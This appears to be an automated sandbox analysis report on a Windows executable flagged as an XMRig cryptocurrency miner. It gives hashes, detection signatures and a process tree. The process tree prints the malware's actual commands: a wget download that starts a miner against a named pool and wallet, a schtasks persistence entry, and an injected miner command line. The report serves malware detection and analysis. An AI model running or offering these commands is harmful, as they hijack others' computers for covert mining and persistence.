Resubmissions
10-10-2024 04:54
241010-fjqxaaxgme 1010-10-2024 02:37
241010-c366tsvgpc 1029-01-2024 18:13
240129-wtq8sshdcl 10Analysis
-
max time kernel
95s -
max time network
122s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
10-10-2024 02:37
Static task
static1
Behavioral task
behavioral1
Sample
9b3430f42a0fb00d014c2fa208662865.exe
Resource
win7-20240903-en
General
-
Target
9b3430f42a0fb00d014c2fa208662865.exe
-
Size
4.8MB
-
MD5
9b3430f42a0fb00d014c2fa208662865
-
SHA1
09a16508bcc0a6da90c272daa2eff627ccd3205d
-
SHA256
8062eb6eea56d33e35ea32f6eef98636bbd66c2d177c1889c4f0a960b0d14d47
-
SHA512
d2887d08a66e10af1e89fb60f2a4f8d7bae7dc5cccc0301a70cb5ff120094c5e6247b44cf3b1b2b1c7e5d48e687319b842a721d757ebb44cf484ef766db92e29
-
SSDEEP
98304:CdlaF/1RByjAQG/Mul2rq/aReDkizMeQUh:CdYvkji/Mul2rVe4iwVUh
Malware Config
Signatures
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral2/memory/2172-20-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/2172-24-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/2172-26-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/2172-25-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/2172-23-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/2172-27-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/2172-28-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/2172-30-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/2172-32-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/2172-31-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig -
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral2/memory/1176-1-0x0000000000530000-0x0000000000A0A000-memory.dmp net_reactor behavioral2/files/0x0008000000023c95-9.dat net_reactor -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation .exe -
Executes dropped EXE 1 IoCs
pid Process 1416 .exe -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1416 set thread context of 2172 1416 .exe 95 -
resource yara_rule behavioral2/memory/2172-17-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/2172-19-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/2172-20-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/2172-24-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/2172-26-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/2172-25-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/2172-23-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/2172-27-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/2172-28-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/2172-30-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/2172-32-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/2172-31-0x0000000140000000-0x00000001407DC000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
pid Process 2264 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3016 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1416 .exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1176 9b3430f42a0fb00d014c2fa208662865.exe Token: SeDebugPrivilege 1416 .exe Token: SeLockMemoryPrivilege 2172 vbc.exe Token: SeLockMemoryPrivilege 2172 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2172 vbc.exe -
Suspicious use of WriteProcessMemory 17 IoCs
description pid Process procid_target PID 1176 wrote to memory of 4328 1176 9b3430f42a0fb00d014c2fa208662865.exe 85 PID 1176 wrote to memory of 4328 1176 9b3430f42a0fb00d014c2fa208662865.exe 85 PID 4328 wrote to memory of 2264 4328 cmd.exe 87 PID 4328 wrote to memory of 2264 4328 cmd.exe 87 PID 4328 wrote to memory of 1416 4328 cmd.exe 90 PID 4328 wrote to memory of 1416 4328 cmd.exe 90 PID 1416 wrote to memory of 1904 1416 .exe 91 PID 1416 wrote to memory of 1904 1416 .exe 91 PID 1904 wrote to memory of 3016 1904 cmd.exe 93 PID 1904 wrote to memory of 3016 1904 cmd.exe 93 PID 1416 wrote to memory of 2172 1416 .exe 95 PID 1416 wrote to memory of 2172 1416 .exe 95 PID 1416 wrote to memory of 2172 1416 .exe 95 PID 1416 wrote to memory of 2172 1416 .exe 95 PID 1416 wrote to memory of 2172 1416 .exe 95 PID 1416 wrote to memory of 2172 1416 .exe 95 PID 1416 wrote to memory of 2172 1416 .exe 95 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\9b3430f42a0fb00d014c2fa208662865.exeC:\Users\Admin\AppData\Local\Temp\9b3430f42a0fb00d014c2fa208662865.exe wget "https://github.com/xmrig/xmrig/releases/download/v6.22.0/xmrig-6.22.0-jammy-x64.tar.gz" && tar xvf xmrig-6.22.0-jammy-x64.tar.gz && cd xmrig-6.22.0 && ./xmrig --donate-level 5 -o rx-us.unmineable.com:3333 -u TRX:TX1itTERFgpH3ahh3E6hsSazdnVo8hEtry.21-11 -p x -a rx/01⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1176 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp8954.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
PID:4328 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:2264
-
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1416 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1904 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"5⤵
- Scheduled Task/Job: Scheduled Task
PID:3016
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work2 -a rx/0 --donate-level 1 --opencl4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2172
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.8MB
MD59b3430f42a0fb00d014c2fa208662865
SHA109a16508bcc0a6da90c272daa2eff627ccd3205d
SHA2568062eb6eea56d33e35ea32f6eef98636bbd66c2d177c1889c4f0a960b0d14d47
SHA512d2887d08a66e10af1e89fb60f2a4f8d7bae7dc5cccc0301a70cb5ff120094c5e6247b44cf3b1b2b1c7e5d48e687319b842a721d757ebb44cf484ef766db92e29
-
Filesize
168B
MD55f25e29b84fdfe9a67fa9f04e7263049
SHA131edaf8d2f246e027d716eb3692b65127d51577e
SHA2562c90d80284d3461cf4787d38a5dd11bd2e8d7c0b2bfc4a9b5bfa4c7496b5da67
SHA512826c3a261e6944574bdeee5e7af0c56fe3cc33a7c51bab50a70422f755844c5aa63268b386be4afb75bc6984f46d0ca0671116273a83c4419360ec7fbded115e